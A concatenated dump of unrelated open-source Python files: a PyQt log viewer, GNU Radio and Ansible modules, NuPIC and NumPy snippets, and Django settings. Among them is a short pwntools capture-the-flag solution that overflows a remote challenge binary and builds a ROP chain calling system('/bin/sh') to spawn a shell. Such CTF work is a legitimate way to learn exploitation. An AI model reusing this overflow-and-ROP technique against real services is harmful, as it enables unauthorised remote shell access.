# changetype column
(changetype, _) = super(cChangeModel, self).data(index, Qt.DisplayRole).toInt()
return nafdb.CHANGESTRING[changetype]
elif index.column() == 3:
# description column
description = unicode(super(cChangeModel, self).data(index, Qt.DisplayRole).toString())
try:
descriptionList = json.loads(description)
value = [item['column'] for item in descriptionList]
return ', '.join(value)
except:
return description
return super(cChangeModel, self).data(index, role)
class cChangeTableView(QtGui.QTableView):
def __init__(self, parent, model, selectionHandler=None):
super(cChangeTableView, self).__init__(parent, sortingEnabled=True)
self.selectionHandler = selectionHandler
self.setModel(model)
hiddencols = (1, 8)
map(self.setColumnHidden, hiddencols, [True]*len(hiddencols))
self.setHeader()
self.resizeColumnToContents(2)
self.setSelectionBehavior(QtGui.QTableView.SelectRows)
self.setSelectionMode(QtGui.QTableView.SingleSelection)
def getHeaderString(self, name):
return {'id': self.tr('Change ID'),
'typeid': self.tr('Artifact Type'),
'title': self.tr('Title'),
'description': self.tr('Affected fields'),
'afid': self.tr('Artifact ID'),
'changetype': self.tr('Change type'),
'date': self.tr('Date'),
'user': self.tr('User'),
'viewpos': self.tr('View pos')}[name]
def setHeader(self):
model = self.model()
for section in range(model.columnCount()):
colname = unicode(model.headerData(section, Qt.Horizontal) .toString())
model.setHeaderData(section, Qt.Horizontal, self.getHeaderString(colname))
def currentChanged(self, current, previous):
super(cChangeTableView, self).currentChanged(current, previous)
if self.selectionHandler: self.selectionHandler(current)
class cDetailView(QtGui.QWidget):
def __init__(self, parent):
super(cDetailView, self).__init__(parent)
self.setLayout(QtGui.QGridLayout())
self.setMinimumSize(200, 200)
def _isHtml(self, string):
if type(string) in types.StringTypes:
return string.startswith("<!")
else:
return False
def updateView(self, data):
try:
itemList = json.loads(data)
except:
return
for label, col in zip([self.tr('Old value'), self.tr('New value')], [1, 2]):
lbl = QtGui.QLabel(label)
lbl.setStyleSheet("font-weight: bold; background-color:rgba(255, 10, 10, 10%); border-style: outset; border-width:2px; border-color:#909090;")
self.layout().addWidget(lbl, 0, col, alignment=Qt.AlignTop)
row = 1
for item in itemList:
for field, col in zip(['old', 'new'], [1, 2]):
if self._isHtml(item['old']) or self._isHtml(item['new']):
widget = _naf_textviewer.cTextEditor(self, readOnly=True)
widget.setImageProvider(_imageProvider)
widget.setHtml(item[field])
alignment=Qt.AlignTop
else:
widget = QtGui.QLineEdit()
widget.setText(unicode(item[field]))
alignment=Qt.AlignVCenter
self.layout().addWidget(widget, row, col, alignment=Qt.AlignTop)
if item.has_key('table'):
# this key is available in version 0.3.1 and newer
s = nafdb.getColumnDisplayName(item['table'], item['column'])
else:
s = item['column']
self.layout().addWidget(QtGui.QLabel(s, alignment=alignment), row, 0)
row = row + 1
self.layout().addItem(QtGui.QSpacerItem(1,1, 1, -1), row, 0)
class cMainWin(QtGui.QMainWindow):
def __init__(self, dbName=None):
super(cMainWin, self).__init__()
self.winTitle = WINTITLE
self.setWindowTitle(self.winTitle)
self.setMinimumSize(800, 600)
self.setBaseSize(800, 750)
self.dockWidget = QtGui.QDockWidget(self.tr("Details"), self)
self.dockWidget.setAllowedAreas(Qt.RightDockWidgetArea | Qt.BottomDockWidgetArea)
openAction = QtGui.QAction(QtGui.QIcon(':/icons/database_open.png'), self.tr('Open database'), self,
triggered = self.openDatabase,shortcut=QtGui.QKeySequence.Open)
aboutAction = QtGui.QAction(QtGui.QIcon(':/icons/help-browser.png'), self.tr('About'), self,
triggered=self.showAbout, shortcut=QtGui.QKeySequence.HelpContents)
exitAction = QtGui.QAction(QtGui.QIcon(':/icons/system-log-out.png'), self.tr('Exit'), self,
triggered=self.close, shortcut=QtGui.QKeySequence('Alt+X'))
menuBar = self.menuBar()
fileMenu = menuBar.addMenu(self.tr('&File'))
map(fileMenu.addAction, (openAction, exitAction))
viewMenu = menuBar.addMenu(self.tr('&View'))
map(viewMenu.addAction, (self.dockWidget.toggleViewAction(), ))
helpMenu = menuBar.addMenu(self.tr('&Help'))
map(helpMenu.addAction, (aboutAction, ))
if dbName:
self.openDatabase(None, dbName)
def openDatabase(self, sender=None, fileName=None):
if fileName is None:
fileName = unicode(QtGui.QFileDialog.getOpenFileName(self, self.tr("Open database"), ".", self.tr("Database Files (*.db);;All files (*.*)")))
if fileName == '':
return
try:
self._loadDatabase(fileName)
except:
(type_, value, tb) = sys.exc_info()
self.showExceptionMessageBox(type_, value, tb)
def showAbout(self):
aboutText = unicode(self.tr("""
<div align="center" style="font-size:large;">
<p style="font-size:x-large;"><b>openADAMS Log Viewer %s</b></p>
<p><small>[%s]</small><p>
<p>Copyright (C) 2012 Achim Köhler</p>
<p>Log viewer for the Open "Artifact Documentation And Management System"</p>
<p>See <a href="https://sourceforge.net/projects/openadams/">openADAMS Homepage</a> for details.</p>
<blockquote>This program comes with ABSOLUTELY NO WARRANTY;<br/>
This is free software, and you are welcome to redistribute it<br/>
under the terms of the GNU General Public License; <br/>
see the accompanied file COPYING for details.
</blockquote>
</div>
""")) % (VERSION, VERSION_STR)
_naf_about.cAbout(self, aboutText).exec_()
def _loadDatabase(self, fileName):
self.database = None
self.database = QtSql.QSqlDatabase.addDatabase("QSQLITE")
self.database.setHostName("")
self.database.setDatabaseName(fileName)
self.database.open()
model = cChangeModel(None, self.database)
model.select()
self.tableView = cChangeTableView(self, model, self.tableSelectionChanged)
self.setCentralWidget(self.tableView)
self.detailView = cDetailView(self.dockWidget)
self.dockWidget.setWidget(self.detailView)
self.addDockWidget(Qt.BottomDockWidgetArea, self.dockWidget)
self.setWindowTitle(QtCore.QFileInfo(fileName).baseName() + ' - ' + WINTITLE)
def tableSelectionChanged(self, index):
row = self.tableView.currentIndex().row()
index = self.tableView.model().index(row, 3)
data = unicode(self.tableView.model().origdata(index).toString())
self.updateView(data)
def updateView(self, data):
self.detailView.close()
self.detailView = cDetailView(self.dockWidget)
self.detailView.updateView(data)
self.dockWidget.setWidget(self.detailView)
def showExceptionMessageBox(self, type_, value, tb):
msgBox = QtGui.QMessageBox(QtGui.QMessageBox.Warning, self.tr("Error"), QtCore.QString(unicode(value)))
msgBox.setDetailedText(QtCore.QString(''.join(traceback.format_exception( type_, value, tb))))
msgBox.exec_()
# ------------------------------------------------------------------------------
def _imageProvider(imgId):
query = QtSql.QSqlQuery("SELECT image FROM images WHERE id==%d" % imgId)
query.next()
return query.value(0).toByteArray()
# ------------------------------------------------------------------------------
def start():
parser = argparse.ArgumentParser(prog=PROGNAME,
description=ABOUTMSG,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('-V', '--version', action='version', version='%s %s\n%s' % (PROGNAME, VERSION, SVN_STR))
parser.add_argument('-l', '--log', action='store', nargs=1, default=['critical'], type=str,
help='log level, either debug, info, error', metavar='lvl', dest='loglevel',
choices=['debug', 'info', 'error'])
parser.add_argument('databasefile', action='store', type=str, nargs='?',
help='Database file')
namespace=parser.parse_args()
level = {'critical':logging.CRITICAL, 'debug': logging.DEBUG,
'info': logging.INFO, 'error': logging.ERROR}[namespace.loglevel[0]]
logFormat = '%(module)s:%(lineno)s (%(funcName)s): %(message)s'
logging.basicConfig(format=logFormat, level=level,
##, filemode='w', filename='myapp.log'
)
mainwin = cMainWin(namespace.databasefile)
mainwin.show()
    sys.exit(app.exec_())
if __name__ == "__main__":
start() |
mbr0wn/gnuradio | refs/heads/master | grc/gui/canvas/port.py | 5 | """
Copyright 2007, 2008, 2009 Free Software Foundation, Inc.
This file is part of GNU Radio
SPDX-License-Identifier: GPL-2.0-or-later
"""
import math
from gi.repository import Gtk, PangoCairo, Pango
from . import colors
from .drawable import Drawable
from .. import Actions, Utils, Constants
from ...core.utils.descriptors import nop_write
from ...core.ports import Port as CorePort
class Port(CorePort, Drawable):
"""The graphical port."""
def __init__(self, parent, direction, **n):
"""
Port constructor.
Create list of connector coordinates.
"""
super(self.__class__, self).__init__(parent, direction, **n)
Drawable.__init__(self)
self._connector_coordinate = (0, 0)
self._hovering = False
self.force_show_label = False
self._area = []
self._bg_color = self._border_color = 0, 0, 0, 0
self._font_color = list(colors.FONT_COLOR)
self._line_width_factor = 1.0
self._label_layout_offsets = 0, 0
self.width_with_label = self.height = 0
self.label_layout = None
@property
def width(self):
return self.width_with_label if self._show_label else Constants.PORT_LABEL_HIDDEN_WIDTH
@width.setter
def width(self, value):
self.width_with_label = value
self.label_layout.set_width(value * Pango.SCALE)
def _update_colors(self):
"""
        Update the colors that represent this port's type.

        Shades differ for ports where the vec length is 1 or greater than 1.
        """
if not self.parent_block.enabled:
self._font_color[-1] = 0.4
color = colors.BLOCK_DISABLED_COLOR
elif self.domain == Constants.GR_MESSAGE_DOMAIN:
color = colors.PORT_TYPE_TO_COLOR.get('message')
else:
self._font_color[-1] = 1.0
color = colors.PORT_TYPE_TO_COLOR.get(self.dtype) or colors.PORT_TYPE_TO_COLOR.get('')
if self.vlen > 1:
dark = (0, 0, 30 / 255.0, 50 / 255.0, 70 / 255.0)[min(4, self.vlen)]
color = tuple(max(c - dark, 0) for c in color)
self._bg_color = color
self._border_color = tuple(max(c - 0.3, 0) for c in color)
def create_shapes(self):
"""Create new areas and labels for the port."""
if self.is_horizontal():
self._area = (0, 0, self.width, self.height)
elif self.is_vertical():
self._area = (0, 0, self.height, self.width)
self.bounds_from_area(self._area)
self._connector_coordinate = {
0: (self.width, self.height / 2),
90: (self.height / 2, 0),
180: (0, self.height / 2),
270: (self.height / 2, self.width)
}[self.connector_direction]
def create_labels(self, cr=None):
"""Create the labels for the socket."""
self.label_layout = Gtk.DrawingArea().create_pango_layout('')
self.label_layout.set_alignment(Pango.Alignment.CENTER)
if cr:
PangoCairo.update_layout(cr, self.label_layout)
if self.domain in (Constants.GR_MESSAGE_DOMAIN, Constants.GR_STREAM_DOMAIN):
self._line_width_factor = 1.0
else:
self._line_width_factor = 2.0
self._update_colors()
layout = self.label_layout
layout.set_markup('<span font_desc="{font}">{name}</span>'.format(
name=Utils.encode(self.name), font=Constants.PORT_FONT
))
label_width, label_height = self.label_layout.get_size()
self.width = 2 * Constants.PORT_LABEL_PADDING + label_width / Pango.SCALE
self.height = (2 * Constants.PORT_LABEL_PADDING + label_height*(3 if self.dtype == 'bus' else 1)) / Pango.SCALE
self._label_layout_offsets = [0, Constants.PORT_LABEL_PADDING]
self.height += self.height % 2 # uneven height
def draw(self, cr):
"""
Draw the socket with a label.
"""
if self.hidden:
return
border_color = self._border_color
cr.set_line_width(self._line_width_factor * cr.get_line_width())
cr.translate(*self.coordinate)
cr.rectangle(*self._area)
cr.set_source_rgba(*self._bg_color)
cr.fill_preserve()
cr.set_source_rgba(*border_color)
cr.stroke()
if not self._show_label:
return # this port is folded (no label)
if self.is_vertical():
cr.rotate(-math.pi / 2)
cr.translate(-self.width, 0)
cr.translate(*self._label_layout_offsets)
cr.set_source_rgba(*self._font_color)
PangoCairo.update_layout(cr, self.label_layout)
PangoCairo.show_layout(cr, self.label_layout)
@property
def connector_coordinate_absolute(self):
"""the coordinate where connections may attach to"""
return [sum(c) for c in zip(
self._connector_coordinate, # relative to port
self.coordinate, # relative to block
self.parent_block.coordinate # abs
)]
@property
def connector_direction(self):
"""Get the direction that the socket points: 0,90,180,270."""
if self.is_source:
return self.rotation
elif self.is_sink:
return (self.rotation + 180) % 360
@nop_write
@property
def rotation(self):
return self.parent_block.rotation
def rotate(self, direction):
"""
Rotate the parent rather than self.
Args:
direction: degrees to rotate
"""
self.parent_block.rotate(direction)
def move(self, delta_coor):
"""Move the parent rather than self."""
self.parent_block.move(delta_coor)
@property
def highlighted(self):
return self.parent_block.highlighted
@highlighted.setter
def highlighted(self, value):
self.parent_block.highlighted = value
@property
def _show_label(self):
"""
Figure out if the label should be hidden
Returns:
true if the label should not be shown
"""
return self._hovering or self.force_show_label or not Actions.TOGGLE_AUTO_HIDE_PORT_LABELS.get_active()
def mouse_over(self):
"""
Called from flow graph on mouse-over
"""
changed = not self._show_label
self._hovering = True
return changed
def mouse_out(self):
"""
Called from flow graph on mouse-out
"""
label_was_shown = self._show_label
self._hovering = False
return label_was_shown != self._show_label
|
bjolivot/ansible | refs/heads/devel | lib/ansible/modules/network/illumos/dladm_etherstub.py | 70 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2015, Adam Števko <adam.stevko@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: dladm_etherstub
short_description: Manage etherstubs on Solaris/illumos systems.
description:
- Create or delete etherstubs on Solaris/illumos systems.
version_added: "2.2"
author: Adam Števko (@xen0l)
options:
name:
description:
- Etherstub name.
required: true
temporary:
description:
- Specifies that the etherstub is temporary. Temporary etherstubs
do not persist across reboots.
required: false
default: false
choices: [ "true", "false" ]
state:
description:
- Create or delete Solaris/illumos etherstub.
required: false
default: "present"
choices: [ "present", "absent" ]
'''
EXAMPLES = '''
# Create 'stub0' etherstub
- dladm_etherstub:
name: stub0
state: present
# Remove 'stub0' etherstub
- dladm_etherstub:
name: stub0
state: absent
'''
RETURN = '''
name:
description: etherstub name
returned: always
type: string
sample: "switch0"
state:
description: state of the target
returned: always
type: string
sample: "present"
temporary:
description: etherstub's persistence
returned: always
type: boolean
sample: "True"
'''
class Etherstub(object):
def __init__(self, module):
self.module = module
self.name = module.params['name']
self.temporary = module.params['temporary']
self.state = module.params['state']
def etherstub_exists(self):
cmd = [self.module.get_bin_path('dladm', True)]
cmd.append('show-etherstub')
cmd.append(self.name)
(rc, _, _) = self.module.run_command(cmd)
if rc == 0:
return True
else:
return False
def create_etherstub(self):
cmd = [self.module.get_bin_path('dladm', True)]
cmd.append('create-etherstub')
if self.temporary:
cmd.append('-t')
cmd.append(self.name)
return self.module.run_command(cmd)
def delete_etherstub(self):
cmd = [self.module.get_bin_path('dladm', True)]
cmd.append('delete-etherstub')
if self.temporary:
cmd.append('-t')
cmd.append(self.name)
return self.module.run_command(cmd)
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(required=True),
temporary=dict(default=False, type='bool'),
state=dict(default='present', choices=['absent', 'present']),
),
supports_check_mode=True
)
etherstub = Etherstub(module)
rc = None
out = ''
err = ''
result = {}
result['name'] = etherstub.name
result['state'] = etherstub.state
result['temporary'] = etherstub.temporary
if etherstub.state == 'absent':
if etherstub.etherstub_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = etherstub.delete_etherstub()
if rc != 0:
module.fail_json(name=etherstub.name, msg=err, rc=rc)
elif etherstub.state == 'present':
if not etherstub.etherstub_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = etherstub.create_etherstub()
if rc is not None and rc != 0:
module.fail_json(name=etherstub.name, msg=err, rc=rc)
if rc is None:
result['changed'] = False
else:
result['changed'] = True
if out:
result['stdout'] = out
if err:
result['stderr'] = err
module.exit_json(**result)
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
|
marionleborgne/nupic | refs/heads/master | tests/integration/nupic/opf/opf_checkpoint_test/experiments/temporal_multi_step/a/description.py | 6 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2011-2015, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
## This file defines parameters for a prediction experiment.
###############################################################################
# IMPORTANT!!!
# This params file is dynamically generated by the RunExperimentPermutations
# script. Any changes made manually will be over-written the next time
# RunExperimentPermutations is run!!!
###############################################################################
from nupic.frameworks.opf.expdescriptionhelpers import importBaseDescription
# the sub-experiment configuration
config ={
'modelParams' : {'sensorParams': {'encoders': {u'c0_timeOfDay': None, u'c0_dayOfWeek': None, u'c1': {'name': 'c1', 'clipInput': True, 'n': 275, 'fieldname': 'c1', 'w': 21, 'type': 'AdaptiveScalarEncoder'}, u'c0_weekend': None}}, 'spParams': {'synPermInactiveDec': 0.052500000000000005}, 'tmParams': {'minThreshold': 11, 'activationThreshold': 14, 'pamLength': 3}, 'clParams': {'alpha': 0.050050000000000004}},
'firstRecord': 0,
'lastRecord': 250,
}
mod = importBaseDescription('../base.py', config)
locals().update(mod.__dict__)
|
maneeshd/PyTutorial | refs/heads/master | Advanced/Numpy/NumpyBasics.py | 1 | """
@author: Maneesh D
@email: maneeshd77@gmail.com
@date: 13-03-2017
"""
import numpy as np
a = np.array([[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]], dtype=np.int64)
b = np.arange(11, 21).reshape(2, 5)
print(a)
print(a.shape)
print(a.dtype)
print()
print(b)
print(b.shape)
print(b.dtype)
print()
print(a + b)
print()
print(a - b)
print()
print(a * b)
print()
print(a / b)
print()
print(a < 8)
print()
print(a * np.cos(0))
print()
print(b + np.sin(45))
print()
c = np.array([[21, 22, 23, 24], [25, 26, 27, 28]], dtype=np.complex)
print(c)
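The scalar operations above (`a * np.cos(0)`, `b + np.sin(45)`) are the simplest case of NumPy broadcasting; the same rule also aligns whole arrays of different shapes. A small sketch:

```python
import numpy as np

row = np.arange(5)                 # shape (5,)
col = np.arange(2).reshape(2, 1)   # shape (2, 1)

# (2, 1) and (5,) broadcast to a common shape (2, 5)
grid = col * 10 + row
print(grid)
```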
|
mkoistinen/joule | refs/heads/master | manage.py | 1 | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "joule.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
chenyoufu/writeups | refs/heads/master | jarvisoj/pwn_level2_x64.py | 1 | from pwn import *
p = remote("pwn2.jarvisoj.com", 9882)
rop0 = 0x00000000004006b3        # gadget: pop rdi ; ret
bin_sh = 0x0000000000600a90      # address of the "/bin/sh" string
system_plt = 0x00000000004004c0  # system@plt
payload = b'A' * 136 + p64(rop0) + p64(bin_sh) + p64(system_plt)
p.send(payload)
p.interactive()
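pwntools' `p64` simply packs an integer as 8 little-endian bytes for the stack; an equivalent using only the standard library (a sketch, pwntools not required) is:

```python
import struct

def p64_local(value):
    """Pack an integer as 8 little-endian bytes, like pwntools' p64."""
    return struct.pack('<Q', value)

# The gadget address 0x4006b3 lands low-byte-first in the payload.
print(p64_local(0x00000000004006b3).hex())  # 'b306400000000000'
```

This is why the ROP chain above can be built by simple byte concatenation.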
|
tysonclugg/django | refs/heads/master | django/conf/global_settings.py | 39 | """
Default Django settings. Override these with settings in the module pointed to
by the DJANGO_SETTINGS_MODULE environment variable.
"""
# This is defined here as a do-nothing function because we can't import
# django.utils.translation -- that module depends on the settings.
def gettext_noop(s):
return s
####################
# CORE #
####################
DEBUG = False
# Whether the framework should propagate raw exceptions rather than catching
# them. This is useful under some testing situations and should never be used
# on a live site.
DEBUG_PROPAGATE_EXCEPTIONS = False
# Whether to use the "ETag" header. This saves bandwidth but slows down performance.
# Deprecated (RemovedInDjango21Warning) in favor of ConditionalGetMiddleware
# which sets the ETag regardless of this setting.
USE_ETAGS = False
# People who get code error notifications.
# In the format [('Full Name', 'email@example.com'), ('Full Name', 'anotheremail@example.com')]
ADMINS = []
# List of IP addresses, as strings, that:
# * See debug comments, when DEBUG is true
# * Receive x-headers
INTERNAL_IPS = []
# Hosts/domain names that are valid for this site.
# "*" matches anything, ".example.com" matches example.com and all subdomains
ALLOWED_HOSTS = []
# Local time zone for this installation. All choices can be found here:
# https://en.wikipedia.org/wiki/List_of_tz_zones_by_name (although not all
# systems may support all possibilities). When USE_TZ is True, this is
# interpreted as the default user time zone.
TIME_ZONE = 'America/Chicago'
# If you set this to True, Django will use timezone-aware datetimes.
USE_TZ = False
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
# Languages we provide translations for, out of the box.
LANGUAGES = [
('af', gettext_noop('Afrikaans')),
('ar', gettext_noop('Arabic')),
('ast', gettext_noop('Asturian')),
('az', gettext_noop('Azerbaijani')),
('bg', gettext_noop('Bulgarian')),
('be', gettext_noop('Belarusian')),
('bn', gettext_noop('Bengali')),
('br', gettext_noop('Breton')),
('bs', gettext_noop('Bosnian')),
('ca', gettext_noop('Catalan')),
('cs', gettext_noop('Czech')),
('cy', gettext_noop('Welsh')),
('da', gettext_noop('Danish')),
('de', gettext_noop('German')),
('dsb', gettext_noop('Lower Sorbian')),
('el', gettext_noop('Greek')),
('en', gettext_noop('English')),
('en-au', gettext_noop('Australian English')),
('en-gb', gettext_noop('British English')),
('eo', gettext_noop('Esperanto')),
('es', gettext_noop('Spanish')),
('es-ar', gettext_noop('Argentinian Spanish')),
('es-co', gettext_noop('Colombian Spanish')),
('es-mx', gettext_noop('Mexican Spanish')),
('es-ni', gettext_noop('Nicaraguan Spanish')),
('es-ve', gettext_noop('Venezuelan Spanish')),
('et', gettext_noop('Estonian')),
('eu', gettext_noop('Basque')),
('fa', gettext_noop('Persian')),
('fi', gettext_noop('Finnish')),
('fr', gettext_noop('French')),
('fy', gettext_noop('Frisian')),
('ga', gettext_noop('Irish')),
('gd', gettext_noop('Scottish Gaelic')),
('gl', gettext_noop('Galician')),
('he', gettext_noop('Hebrew')),
('hi', gettext_noop('Hindi')),
('hr', gettext_noop('Croatian')),
('hsb', gettext_noop('Upper Sorbian')),
('hu', gettext_noop('Hungarian')),
('ia', gettext_noop('Interlingua')),
('id', gettext_noop('Indonesian')),
('io', gettext_noop('Ido')),
('is', gettext_noop('Icelandic')),
('it', gettext_noop('Italian')),
('ja', gettext_noop('Japanese')),
('ka', gettext_noop('Georgian')),
('kk', gettext_noop('Kazakh')),
('km', gettext_noop('Khmer')),
('kn', gettext_noop('Kannada')),
('ko', gettext_noop('Korean')),
('lb', gettext_noop('Luxembourgish')),
('lt', gettext_noop('Lithuanian')),
('lv', gettext_noop('Latvian')),
('mk', gettext_noop('Macedonian')),
('ml', gettext_noop('Malayalam')),
('mn', gettext_noop('Mongolian')),
('mr', gettext_noop('Marathi')),
('my', gettext_noop('Burmese')),
('nb', gettext_noop('Norwegian Bokmål')),
('ne', gettext_noop('Nepali')),
('nl', gettext_noop('Dutch')),
('nn', gettext_noop('Norwegian Nynorsk')),
('os', gettext_noop('Ossetic')),
('pa', gettext_noop('Punjabi')),
('pl', gettext_noop('Polish')),
('pt', gettext_noop('Portuguese')),
('pt-br', gettext_noop('Brazilian Portuguese')),
('ro', gettext_noop('Romanian')),
('ru', gettext_noop('Russian')),
('sk', gettext_noop('Slovak')),
('sl', gettext_noop('Slovenian')),
('sq', gettext_noop('Albanian')),
('sr', gettext_noop('Serbian')),
('sr-latn', gettext_noop('Serbian Latin')),
('sv', gettext_noop('Swedish')),
('sw', gettext_noop('Swahili')),
('ta', gettext_noop('Tamil')),
('te', gettext_noop('Telugu')),
('th', gettext_noop('Thai')),
('tr', gettext_noop('Turkish')),
('tt', gettext_noop('Tatar')),
('udm', gettext_noop('Udmurt')),
('uk', gettext_noop('Ukrainian')),
('ur', gettext_noop('Urdu')),
('vi', gettext_noop('Vietnamese')),
('zh-hans', gettext_noop('Simplified Chinese')),
('zh-hant', gettext_noop('Traditional Chinese')),
]
# Languages using BiDi (right-to-left) layout
LANGUAGES_BIDI = ["he", "ar", "fa", "ur"]
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
LOCALE_PATHS = []
# Settings for language cookie
LANGUAGE_COOKIE_NAME = 'django_language'
LANGUAGE_COOKIE_AGE = None
LANGUAGE_COOKIE_DOMAIN = None
LANGUAGE_COOKIE_PATH = '/'
# If you set this to True, Django will format dates, numbers and calendars
# according to the user's current locale.
USE_L10N = False
# Not-necessarily-technical managers of the site. They get broken link
# notifications and other various emails.
MANAGERS = ADMINS
# Default content type and charset to use for all HttpResponse objects, if a
# MIME type isn't manually specified. These are used to construct the
# Content-Type header.
DEFAULT_CONTENT_TYPE = 'text/html'
DEFAULT_CHARSET = 'utf-8'
# Encoding of files read from disk (template and initial SQL files).
FILE_CHARSET = 'utf-8'
# Email address that error messages come from.
SERVER_EMAIL = 'root@localhost'
# Database connection info. If left empty, will default to the dummy backend.
DATABASES = {}
# Classes used to implement DB routing behavior.
DATABASE_ROUTERS = []
# The email backend to use. For possible shortcuts see django.core.mail.
# The default is to use the SMTP backend.
# Third-party backends can be specified by providing a Python path
# to a module that defines an EmailBackend class.
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
# Host for sending email.
EMAIL_HOST = 'localhost'
# Port for sending email.
EMAIL_PORT = 25
# Whether to send SMTP 'Date' header in the local time zone or in UTC.
EMAIL_USE_LOCALTIME = False
# Optional SMTP authentication information for EMAIL_HOST.
EMAIL_HOST_USER = ''
EMAIL_HOST_PASSWORD = ''
EMAIL_USE_TLS = False
EMAIL_USE_SSL = False
EMAIL_SSL_CERTFILE = None
EMAIL_SSL_KEYFILE = None
EMAIL_TIMEOUT = None
# List of strings representing installed apps.
INSTALLED_APPS = []
TEMPLATES = []
# Default form rendering class.
FORM_RENDERER = 'django.forms.renderers.DjangoTemplates'
# Default email address to use for various automated correspondence from
# the site managers.
DEFAULT_FROM_EMAIL = 'webmaster@localhost'
# Subject-line prefix for email messages sent with django.core.mail.mail_admins
# or ...mail_managers. Make sure to include the trailing space.
EMAIL_SUBJECT_PREFIX = '[Django] '
# Whether to append trailing slashes to URLs.
APPEND_SLASH = True
# Whether to prepend the "www." subdomain to URLs that don't have it.
PREPEND_WWW = False
# Override the server-derived value of SCRIPT_NAME
FORCE_SCRIPT_NAME = None
# List of compiled regular expression objects representing User-Agent strings
# that are not allowed to visit any page, systemwide. Use this for bad
# robots/crawlers. Here are a few examples:
# import re
# DISALLOWED_USER_AGENTS = [
# re.compile(r'^NaverBot.*'),
# re.compile(r'^EmailSiphon.*'),
# re.compile(r'^SiteSucker.*'),
# re.compile(r'^sohu-search')
# ]
DISALLOWED_USER_AGENTS = []
ABSOLUTE_URL_OVERRIDES = {}
# List of compiled regular expression objects representing URLs that need not
# be reported by BrokenLinkEmailsMiddleware. Here are a few examples:
# import re
# IGNORABLE_404_URLS = [
# re.compile(r'^/apple-touch-icon.*\.png$'),
# re.compile(r'^/favicon.ico$'),
# re.compile(r'^/robots.txt$'),
# re.compile(r'^/phpmyadmin/'),
# re.compile(r'\.(cgi|php|pl)$'),
# ]
IGNORABLE_404_URLS = []
# A secret key for this particular Django installation. Used in secret-key
# hashing algorithms. Set this in your settings, or Django will complain
# loudly.
SECRET_KEY = ''
# Default file storage mechanism that holds media.
DEFAULT_FILE_STORAGE = 'django.core.files.storage.FileSystemStorage'
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = None
# URL that handles the static files served from STATIC_ROOT.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = None
# List of upload handler classes to be applied in order.
FILE_UPLOAD_HANDLERS = [
'django.core.files.uploadhandler.MemoryFileUploadHandler',
'django.core.files.uploadhandler.TemporaryFileUploadHandler',
]
# Maximum size, in bytes, of a request before it will be streamed to the
# file system instead of into memory.
FILE_UPLOAD_MAX_MEMORY_SIZE = 2621440 # i.e. 2.5 MB
# Maximum size in bytes of request data (excluding file uploads) that will be
# read before a SuspiciousOperation (RequestDataTooBig) is raised.
DATA_UPLOAD_MAX_MEMORY_SIZE = 2621440 # i.e. 2.5 MB
# Maximum number of GET/POST parameters that will be read before a
# SuspiciousOperation (TooManyFieldsSent) is raised.
DATA_UPLOAD_MAX_NUMBER_FIELDS = 1000
# Directory in which upload streamed files will be temporarily saved. A value of
# `None` will make Django use the operating system's default temporary directory
# (i.e. "/tmp" on *nix systems).
FILE_UPLOAD_TEMP_DIR = None
# The numeric mode to set newly-uploaded files to. The value should be a mode
# you'd pass directly to os.chmod; see https://docs.python.org/3/library/os.html#files-and-directories.
FILE_UPLOAD_PERMISSIONS = None
# The numeric mode to assign to newly-created directories, when uploading files.
# The value should be a mode as you'd pass to os.chmod;
# see https://docs.python.org/3/library/os.html#files-and-directories.
FILE_UPLOAD_DIRECTORY_PERMISSIONS = None
# Python module path where user will place custom format definition.
# The directory where this setting is pointing should contain subdirectories
# named as the locales, containing a formats.py file
# (i.e. "myproject.locale" for myproject/locale/en/formats.py etc. use)
FORMAT_MODULE_PATH = None
# Default formatting for date objects. See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'N j, Y'
# Default formatting for datetime objects. See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATETIME_FORMAT = 'N j, Y, P'
# Default formatting for time objects. See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
TIME_FORMAT = 'P'
